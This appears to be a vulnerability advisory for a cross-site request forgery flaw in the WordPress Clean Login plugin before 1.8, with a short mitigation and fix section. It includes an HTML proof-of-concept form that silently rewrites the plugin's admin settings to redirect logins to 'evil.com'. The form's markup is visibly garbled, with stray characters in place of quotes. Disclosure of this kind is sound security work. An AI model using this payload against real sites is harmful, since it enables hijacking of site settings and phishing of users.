WordPress Clean Login Cross Site Request Forgery

2017.05.10

Credit: Zhiyang Zeng

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

===============

Software Description

===============

Software:clean login

version:<1.8

description:Responsive Frontend Login and Registration plugin.

========

Details

========

CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.

========

POC:

========

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">

  <input type="text" name= "adminbar" value=aon">

a<input type="text" name="emailnotificationcontent" value="">
a<input type="text" name="termsconditionsMSG" value="">
a<input type="text" name="termsconditionsURL" value="">
a<input type="text" name="urlredirect" value=ahttp://127.0.0.1/wordpressa>
a<input type=atexta name="loginredirecta value=aona>
a<input type=atexta name="loginredirect_urla value="http://evil.coma>
a<input type=atexta name="logoutredirect_urla value="http://127.0.0.1/wordpressa>
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>
a<input type=atexta name="Submita value="Save Changesa>
   <input type="submita>

</form>

=========

Mitigations

================

Disable the plugin until a new version is released that fixes this bug.

=========

Fixed

=========

https://wordpress.org/plugins/clean-login/#developers(1.8 version update)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Clean Login Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.